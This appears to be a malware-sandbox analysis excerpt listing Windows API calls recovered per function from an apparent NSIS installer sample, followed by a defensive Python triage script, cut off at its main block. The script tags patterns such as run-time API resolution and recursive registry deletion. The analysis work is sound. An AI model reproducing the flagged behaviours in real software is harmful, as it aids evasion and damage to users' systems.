                                        • Opcode Fuzzy Hash: bb0c7447bffed25a47ff2517fd87417c43c35d72d0d658bdc18f354cf5cb2530
                                        • Instruction Fuzzy Hash: 74F0FC305002096BDF149B74DD0DFEB365CAF08704F14097AA586E10D1E9B9D4758B69
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 0040286E
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040288A
                                        • GlobalFree.KERNEL32(?), ref: 004028C9
                                        • GlobalFree.KERNEL32(00000000), ref: 004028DC
                                        • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004028F8
                                        • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 0040290B
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                        • String ID:
                                        • API String ID: 2667972263-0
                                        • Opcode ID: a68628d14a43e02da4207674ff12a1b8572f7d1f991c83550e0ec062b3caa043
                                        • Instruction ID: f5f6ffd272893f167dd8362f30c9a288e23aa0477cfe19fc00766ec7197ba147
                                        • Opcode Fuzzy Hash: a68628d14a43e02da4207674ff12a1b8572f7d1f991c83550e0ec062b3caa043
                                        • Instruction Fuzzy Hash: EA319E32C00124BBEF216FA5CE48D9E7A79EF04364F10823AF554B72E1CB7949419FA8
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: CountTick$wsprintf
                                        • String ID: ... %d%%
                                        • API String ID: 551687249-2449383134
                                        • Opcode ID: f5d90bcb7ebd89fe1cd05b14302609a37f21c12a4aba64411c0a4f0db4ef4cc6
                                        • Instruction ID: 381bea1cd078569db79acba847b1f3aad866332683383cfda6df38e9538e1e3d
                                        • Opcode Fuzzy Hash: f5d90bcb7ebd89fe1cd05b14302609a37f21c12a4aba64411c0a4f0db4ef4cc6
                                        • Instruction Fuzzy Hash: 91513D71800219EBDB10DF65DA84B9E7BB8EB5535AF14417BEC00B72D0CB789A50CBA9
                                        APIs
                                        • CharNextA.USER32(0000000C,*?|<>/":,00000000,?,74DF3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 004065DF
                                        • CharNextA.USER32(0000000C,0000000C,0000000C,00000000,?,74DF3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 004065EC
                                        • CharNextA.USER32(0000000C,?,74DF3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 004065F1
                                        • CharPrevA.USER32(0000000C,0000000C,74DF3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 00406601
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Char$Next$Prev
                                        • String ID: *?|<>/":
                                        • API String ID: 589700163-165019052
                                        • Opcode ID: 5d1a13f5f6d1e26a5c928a636a6cd85ce9cfe8cb66a926baf99f252f8cb630c3
                                        • Instruction ID: 9f335943bb0e62a209881404c60ffb6aa99012b8199ff17f999404b9432e9d26
                                        • Opcode Fuzzy Hash: 5d1a13f5f6d1e26a5c928a636a6cd85ce9cfe8cb66a926baf99f252f8cb630c3
                                        • Instruction Fuzzy Hash: 871104618053923DFB3216282C44B777F894F97760F1A007FE5C2722C6CA7C5C62966D
                                        APIs
                                        • lstrcatA.KERNEL32(00000000,00000000,0040A430,00435800,00000000,00000000,00000031), ref: 004017BD
                                        • CompareFileTime.KERNEL32(-00000014,?,0040A430,0040A430,00000000,00000000,0040A430,00435800,00000000,00000000,00000031), ref: 004017E7
                                          • Part of subcall function 0040628D: lstrcpynA.KERNEL32(0000000C,0000000C,00000400,0040357B,0042E820,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040629A
                                          • Part of subcall function 004053D1: lstrlenA.KERNEL32(00429C68,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                          • Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,00429C68,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                          • Part of subcall function 004053D1: lstrcatA.KERNEL32(00429C68,004032C3,004032C3,00429C68,00000000,?,74DF23A0), ref: 0040542D
                                          • Part of subcall function 004053D1: SetWindowTextA.USER32(00429C68,00429C68), ref: 0040543F
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                        • String ID:
                                        • API String ID: 1941528284-0
                                        • Opcode ID: 1a1072c2038cbf95956adf311cc3bef911504581aab660e216232240bcca97c3
                                        • Instruction ID: a1f186b67c4edeb34fad59b9cedf70daa635d1c2101920768012b0df21243cfe
                                        • Opcode Fuzzy Hash: 1a1072c2038cbf95956adf311cc3bef911504581aab660e216232240bcca97c3
                                        • Instruction Fuzzy Hash: 6041C331900515BBCB107BA5CD46EAF3A78DF05328F20823FF526F11E2D67C8A519AAD
                                        APIs
                                        • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402DB4
                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402E00
                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E09
                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402E20
                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E2B
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: CloseEnum$DeleteValue
                                        • String ID:
                                        • API String ID: 1354259210-0
                                        • Opcode ID: 31db4fe3a83ab3222004bb99c88de970b8ea6707b57bc237e5c93fbc2d64a622
                                        • Instruction ID: 6dce0a33df475c695949d28520f5422678f12aee2cc84e9e423a55bf09ef2c56
                                        • Opcode Fuzzy Hash: 31db4fe3a83ab3222004bb99c88de970b8ea6707b57bc237e5c93fbc2d64a622
                                        • Instruction Fuzzy Hash: 3B215C7250010CBBDF129F90CE89EEF7B6DEB44344F100076FA15B11A0E7B48F54AAA8
                                        APIs
                                        • GetDlgItem.USER32(?,?), ref: 00401DA3
                                        • GetClientRect.USER32(?,?), ref: 00401DF1
                                        • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401E21
                                        • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E35
                                        • DeleteObject.GDI32(00000000), ref: 00401E45
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                        • String ID:
                                        • API String ID: 1849352358-0
                                        • Opcode ID: e1d6a9ee3c5b7c1e8a311aee8a429abf799163a7f8b121a70cc01e31e7316f78
                                        • Instruction ID: fce380eb4141a570f491a0e518fb8aa8e4aa376f46a8457bbd9b5af61eb39f7b
                                        • Opcode Fuzzy Hash: e1d6a9ee3c5b7c1e8a311aee8a429abf799163a7f8b121a70cc01e31e7316f78
                                        • Instruction Fuzzy Hash: AE210A72E00509AFDF15DF94DD45AAEBBB6FB48300F10407AF505F62A1CB389941DB58
                                        APIs
                                        • GetDC.USER32(?), ref: 00401E5D
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E77
                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E7F
                                        • ReleaseDC.USER32(?,00000000), ref: 00401E90
                                        • CreateFontIndirectA.GDI32(0040B830), ref: 00401EDF
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                        • String ID:
                                        • API String ID: 3808545654-0
                                        • Opcode ID: ccc424111de2d8fdc78d27f8554941ebead3544ddde10de4f69b2752e2115fa2
                                        • Instruction ID: 3235dfa2473664f3223cdf9cba53c0ab50ba273bd9661b34cbd5463b8b999ac8
                                        • Opcode Fuzzy Hash: ccc424111de2d8fdc78d27f8554941ebead3544ddde10de4f69b2752e2115fa2
                                        • Instruction Fuzzy Hash: FE017572504344AFE7107B60AE49B9E3FF8E715701F10897AF181B62F2CB7800058B6D
                                        APIs
                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CC3
                                        • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CDB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: MessageSend$Timeout
                                        • String ID: !
                                        • API String ID: 1777923405-2657877971
                                        • Opcode ID: 6b7a83c98c9a4dd998c630d8be00bc685075749139b64b10b53530248dbe3f14
                                        • Instruction ID: 290ea32ff0ec2f544a370e30947e4a0d8eefe4f8a949274a77cee2e27ce3354c
                                        • Opcode Fuzzy Hash: 6b7a83c98c9a4dd998c630d8be00bc685075749139b64b10b53530248dbe3f14
                                        • Instruction Fuzzy Hash: E121B471948209BFEF05AFA4DA86AAE7FB1EF44304F20447EF105B61D1C6B98681DB18
                                        APIs
                                        • lstrlenA.KERNEL32(0042A488,0042A488,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A91,000000DF,00000000,00000400,?), ref: 00404C14
                                        • wsprintfA.USER32 ref: 00404C1C
                                        • SetDlgItemTextA.USER32(?,0042A488), ref: 00404C2F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: ItemTextlstrlenwsprintf
                                        • String ID: %u.%u%s%s
                                        • API String ID: 3540041739-3551169577
                                        • Opcode ID: 535e9ddcb49fc2af00bd827ff7e70f18c38bbd05e3bf044e223da0312c8e4865
                                        • Instruction ID: 5f9a4297b7b6a3636d8a8bee3f83e4b2b5f26aab9c0b753bab98504590b6652f
                                        • Opcode Fuzzy Hash: 535e9ddcb49fc2af00bd827ff7e70f18c38bbd05e3bf044e223da0312c8e4865
                                        • Instruction Fuzzy Hash: BE110A73A041243BEB0065AD9C45FAE3698DB85374F250237FE26F61D1EA78DC1281E9
                                        APIs
                                        • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 004020F5
                                          • Part of subcall function 004053D1: lstrlenA.KERNEL32(00429C68,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                          • Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,00429C68,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                          • Part of subcall function 004053D1: lstrcatA.KERNEL32(00429C68,004032C3,004032C3,00429C68,00000000,?,74DF23A0), ref: 0040542D
                                          • Part of subcall function 004053D1: SetWindowTextA.USER32(00429C68,00429C68), ref: 0040543F
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                        • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402105
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00402115
                                        • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040217F
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                        • String ID:
                                        • API String ID: 2987980305-0
                                        • Opcode ID: d236e91e9817b245ae95546f76f8452ffb34461b05ce790c6aa1380878e74418
                                        • Instruction ID: 18bbb9f6491bb16bc869df63e9f5beea4603ad23440c914569cabcc4b16c920a
                                        • Opcode Fuzzy Hash: d236e91e9817b245ae95546f76f8452ffb34461b05ce790c6aa1380878e74418
                                        • Instruction Fuzzy Hash: ED21C931A00115BBCF20BF659F89B6F7570AB40358F20413BF611B61D1CABD49839A5E
                                        APIs
                                        • DestroyWindow.USER32(?,00000000,004030AB,00000001,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402EE0
                                        • GetTickCount.KERNEL32 ref: 00402EFE
                                        • CreateDialogParamA.USER32(0000006F,00000000,00402E4A,00000000), ref: 00402F1B
                                        • ShowWindow.USER32(00000000,00000005,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402F29
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                        • String ID:
                                        • API String ID: 2102729457-0
                                        • Opcode ID: 82cc071085b0e421d38bebfb76feb0ba11fa504106e74bc84e10844e5b096cab
                                        • Instruction ID: 55e8d60830c64a568362c8f460213b41695a60035779f7009bf19f5ad348a086
                                        • Opcode Fuzzy Hash: 82cc071085b0e421d38bebfb76feb0ba11fa504106e74bc84e10844e5b096cab
                                        • Instruction Fuzzy Hash: B7F03A30A45621EBC771AB50FE0CA9B7B64FB05B59B41043AF001F11A9CB745852DBED
                                        APIs
                                        • IsWindowVisible.USER32(?), ref: 00405374
                                        • CallWindowProcA.USER32(?,?,?,?), ref: 004053C5
                                          • Part of subcall function 00404379: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 0040438B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Window$CallMessageProcSendVisible
                                        • String ID:
                                        • API String ID: 3748168415-3916222277
                                        • Opcode ID: b9d322c03724d0f4ccaad077e5ef09c26c8614d3de5af0662f84842769c694b6
                                        • Instruction ID: 98c6722e6a54b641667f931c9e29074c60bd52ab0debc5010bc9b6450a54dc72
                                        • Opcode Fuzzy Hash: b9d322c03724d0f4ccaad077e5ef09c26c8614d3de5af0662f84842769c694b6
                                        • Instruction Fuzzy Hash: 9201B171100608AFFF205F11ED84A6B3A26EB84794F50413BFE407A1D1C3B98C629E5E
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00405E63
                                        • GetTempFileNameA.KERNEL32(0000000C,?,00000000,?,?,004033D6,00436000,00436400,00436400,00436400,00436400,00436400,00436400,004036B5,?,00000008), ref: 00405E7D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: CountFileNameTempTick
                                        • String ID: nsa
                                        • API String ID: 1716503409-2209301699
                                        • Opcode ID: 785ee4e59b25deabe338fa9c65985dff7b7c4930a860df7800de2eab11a71ed7
                                        • Instruction ID: 3970c65dfeb72379d163dc795dbdbe3f0392b49dfad0d6f3c406a96719355742
                                        • Opcode Fuzzy Hash: 785ee4e59b25deabe338fa9c65985dff7b7c4930a860df7800de2eab11a71ed7
                                        • Instruction Fuzzy Hash: A0F082363042046BDB109F56EC04B9B7B9CEF91750F10803BF9889B180D6B099558798
                                        APIs
                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D95
                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405DAD
                                        • CharNextA.USER32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DBE
                                        • lstrlenA.KERNEL32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DC7
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: lstrlen$CharNextlstrcmpi
                                        • String ID:
                                        • API String ID: 190613189-0
                                        • Opcode ID: 4f1eaa0065bfc49b54b56e64601aea382fadfb9647de4ff4bb676f0ffe3a7a9e
                                        • Instruction ID: 0b01db06aa3b468373a9359c006e34c779135354681a34c4aba1de8cdbfa9028
                                        • Opcode Fuzzy Hash: 4f1eaa0065bfc49b54b56e64601aea382fadfb9647de4ff4bb676f0ffe3a7a9e
                                        • Instruction Fuzzy Hash: 86F0C231100418AFC7029BA5CE0499EBBA8EF06250B2180AAE840F7211D674DE01AB6C
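The "APIs" lists above are the per-function call sets the Joe Sandbox IDA plugin recovered from the dumped image of process 4 (image base 0x400000). When triaging a listing like this it is useful to have those call sets machine-readable, so the following Python script, an added example that is not part of the report and not Joe Sandbox code, parses the bullet format shown on this page ("API.MODULE(args), ref: address", with "Part of subcall function" entries for callees) and tags call combinations that deserve a second look: LoadLibrary/GetModuleHandle paired with GetProcAddress (run-time API resolution, as in the function at 0x004020F5), RegEnumKey paired with RegDeleteKey (recursive registry key deletion, as in the function at 0x00402DB4), and GetTempFileName (temp-file staging, as in the function at 0x00405E63). The sample input is copied from three of the blocks above; the tag names, the pattern table and the A/W suffix-stripping heuristic are the script's own choices, not Joe Sandbox terminology.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample input: "APIs" entries of three function blocks, copied from the
# listing above in the form Joe Sandbox renders them (bullet, API.MODULE(args), ref: addr).
SAMPLE_REPORT = """\
APIs
• RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402DB4
• RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402E00
• RegCloseKey.ADVAPI32(?,?,?), ref: 00402E09
• RegDeleteKeyA.ADVAPI32(?,?), ref: 00402E20
• RegCloseKey.ADVAPI32(?,?,?), ref: 00402E2B
Memory Dump Source
APIs
• GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 004020F5
  • Part of subcall function 004053D1: lstrlenA.KERNEL32(00429C68,00000000), ref: 0040540A
• LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402105
• GetProcAddress.KERNEL32(00000000,?), ref: 00402115
• FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040217F
Memory Dump Source
APIs
• GetTickCount.KERNEL32 ref: 00405E63
• GetTempFileNameA.KERNEL32(0000000C,?,00000000,?), ref: 00405E7D
Strings
"""

# One bullet of an "APIs" list. The argument list is absent when the plugin did not
# recover arguments (e.g. "GetTickCount.KERNEL32 ref: 00405E63").
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: list                          # raw argument tokens; "?" = unresolved by the plugin
    ref: int                            # call-site address inside the dumped image
    subcall_of: Optional[int] = None    # set when the call was seen in a callee, not here


@dataclass
class FunctionBlock:
    calls: list = field(default_factory=list)

    def direct_api_names(self):
        # Only calls made by this function itself; subcall entries belong to the callee,
        # so a shared helper's lstrlen does not inflate every caller's tag set.
        return {normalize(c.name) for c in self.calls if c.subcall_of is None}


def normalize(name: str) -> str:
    """Strip the ANSI/Unicode suffix (LoadLibraryExA -> LoadLibraryEx). Heuristic
    (an assumption of this script): only a trailing A/W after a lowercase letter is
    treated as a suffix, so GetDC stays GetDC."""
    if len(name) > 2 and name[-1] in "AW" and name[-2].islower():
        return name[:-1]
    return name


def parse_blocks(text: str):
    """Split the report text into FunctionBlocks, one per "APIs" heading."""
    blocks, current = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = FunctionBlock()
            blocks.append(current)
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
            current.calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16),
                                         int(m["sub"], 16) if m["sub"] else None))
        elif stripped:
            current = None  # any other heading ("Memory Dump Source", "Strings") ends the list
    return blocks


# Tag -> (APIs that must all be present, APIs of which at least one must be present).
# These tags are this script's own labels, not Joe Sandbox signature names.
PATTERNS = {
    "dynamic-api-resolution": ({"GetProcAddress"}, {"LoadLibrary", "LoadLibraryEx", "GetModuleHandle"}),
    "recursive-registry-key-deletion": ({"RegDeleteKey", "RegEnumKey"}, set()),
    "temp-file-creation": ({"GetTempFileName"}, set()),
}


def classify(block: FunctionBlock):
    names = block.direct_api_names()
    return [tag for tag, (required, any_of) in PATTERNS.items()
            if required <= names and (not any_of or any_of & names)]


if __name__ == "__main__":
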